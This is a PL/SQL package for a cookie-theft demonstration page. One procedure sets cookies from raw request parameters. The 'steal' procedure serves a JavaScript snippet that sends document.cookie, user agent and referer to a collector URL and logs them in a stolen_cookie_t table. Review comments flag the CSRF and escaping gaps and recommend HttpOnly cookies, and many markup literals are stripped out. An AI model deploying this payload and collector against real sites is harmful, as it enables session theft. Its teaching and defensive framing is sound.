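create or replace package body cookie_h is

-- cookie_h: handlers for a cookie demonstration page.
--   form_view : sets or expires cookies from request parameters, then renders
--               the form, a cookie-exposure section and the list of c$* parameters.
--   steal     : serves the demo script, or records what that script reported.
-- NOTE(review): many string literals below are empty or hold only line breaks;
-- the markup they carried looks stripped from this copy. They are kept exactly
-- as found, so literals that span lines must not be re-indented.

-- Sets a cookie when the request carries `name`, otherwise expires every
-- cookie listed in `delname`; on POST it calls h.refresh and stops, on other
-- methods it renders the page.
procedure form_view is
  n varchar2(100); -- current key while walking ra.params
  -- Was varchar2(999): a longer value raised ORA-06502 on assignment and broke
  -- the listing. Values are request-controlled, so use the PL/SQL maximum.
  v varchar2(32767);
begin
  src_b.header;
  x.l('', '[bootstrap.css]');
  x.o('');

  if not r.is_null('name') then
    -- Every argument comes straight from the request.
    -- NOTE(review): nothing visible here checks the method or the caller before
    -- the cookie is set; outside a lab this needs POST-only handling, an
    -- anti-CSRF token and a restriction on which names/domains may be set.
    h.set_cookie(r.getc('name'),
                 r.getc('value'),
                 domain   => r.getc('domain'),
                 path     => r.getc('path'),
                 httponly => r.getb('httponly'),
                 secure   => r.getb('secure'));
    -- disabled in the original:
    --r.setc('c$' || r.getc('name'), r.getc('value'));
  elsif not r.is_lack('delname') then
    -- Expire each named cookie by re-sending it with a past expiry date.
    -- No domain/path is passed, so a cookie that was set with either may not
    -- be matched by the browser -- TODO confirm against h.set_cookie defaults.
    for i in 1 .. r.cnt('delname') loop
      tmp.s := r.getc('delname', idx => i);
      h.set_cookie(tmp.s, r.getc('c$' || tmp.s), httponly => false, expires => trunc(sysdate - 1));
    end loop;
  end if;

  if r.method = 'POST' then
    -- The original had an unreachable h.go(r.prog) after this return; removed.
    h.refresh(1, r.prog);
    return;
  end if;

  x.f('
', r.prog);
  x.o('
');
  x.p('', 'set cookie');
  x.o(' ');
  x.p('
');
  x.c('
');
  x.o('');
  x.t('');
  x.c('');
  x.o('');

  if r.is_lack('cookie') then
    x.p('

', 'insert the following text into form input to steal cookies');
    -- x.e is presumably the escaping helper that shows the snippet as text -- confirm.
    x.p('

', x.e(x.r('', r.dir_full)));
  else
    x.p('

', 'stolen cookie');
    -- NOTE(review): the `cookie` parameter is request-controlled. Confirm x.t
    -- HTML-escapes its argument; if it writes raw text this is reflected
    -- script injection and the value should be escaped first.
    x.t(r.getc('cookie'));
  end if;
  x.c('');

  x.t('


');
  x.p('

', '## This is all http request cookies');
  x.f('
', r.prog);

  -- List every parameter whose name starts with c$ (presumably the request
  -- cookies as exposed by the framework -- confirm). Only the first value of
  -- each is shown.
  -- NOTE(review): n is limited to 100 bytes and both n and v are echoed into
  -- the page; confirm the key length limit of ra.params and that x.p escapes.
  n := ra.params.first;
  x.o('
    ');
  loop
    exit when n is null;
    if n like 'c$%' then
      v := ra.params(n) (1);
      x.p('
  1. ', x.v('', substrb(n, 3)) || ' ' || n || ' : ' || v);
    end if;
    n := ra.params.next(n);
  end loop;
  x.c('
');
  x.s(' ');
  x.c('');
end;

-- Without a `cookie` parameter: writes the demo script, built from a template
-- and r.url_full (x.r presumably substitutes the "@" -- confirm).
-- With a `cookie` parameter: stores the reported cookie string, user agent and
-- referer in stolen_cookie_t, stamped with sysdate.
-- Defensive reading: document.cookie never returns cookies flagged HttpOnly,
-- so session cookies should carry HttpOnly and Secure, and pages should escape
-- user-supplied text so an injected snippet is displayed instead of executed.
procedure steal is
  v stolen_cookie_t%rowtype;
begin
  if r.is_lack('cookie') then
    -- no cookie parameter: emit the script content
    x.t(x.r(' $.ajax("@",{ dataType: "jsonp", data: { cookie:document.cookie, ua:navigator.userAgent, referer:document.referrer } }); ', r.url_full));
  else
    -- cookie parameter present: record what was reported
    -- NOTE(review): lengths are not checked; a value longer than its column
    -- raises on assignment -- TODO confirm stolen_cookie_t column sizes.
    v.logtime := sysdate;
    v.referer := r.getc('referer');
    v.cookies := r.getc('cookie');
    v.ua := r.getc('ua');
    -- Static SQL with a record bind: request values are never concatenated
    -- into the statement. No commit is issued here; presumably the framework
    -- ends the transaction -- confirm.
    insert into stolen_cookie_t values v;
  end if;
end;

end cookie_h;
/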